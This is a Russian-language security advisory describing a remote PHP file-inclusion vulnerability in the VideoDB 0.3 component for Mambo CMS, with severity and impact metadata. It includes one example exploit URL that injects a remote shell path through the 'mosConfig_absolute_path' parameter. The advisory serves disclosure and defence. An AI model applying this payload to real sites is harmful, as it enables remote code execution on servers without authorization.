PHP-инклюдинг в Mambo VideoDB

Дата публикации:
19.07.2006
Всего просмотров:
3305
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
VideoDB 0.x (компонент к Mambo)
Уязвимые версии: VideoDB (компонент Mambo) 0.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_videodb/core/videodb.class.xml.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[shell]

URL производителя: mamboxchange.com/projects/videodb/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: com_videodb Mambo Componenet <= 0.3en Remote Include Vulnerability

или введите имя

CAPTCHA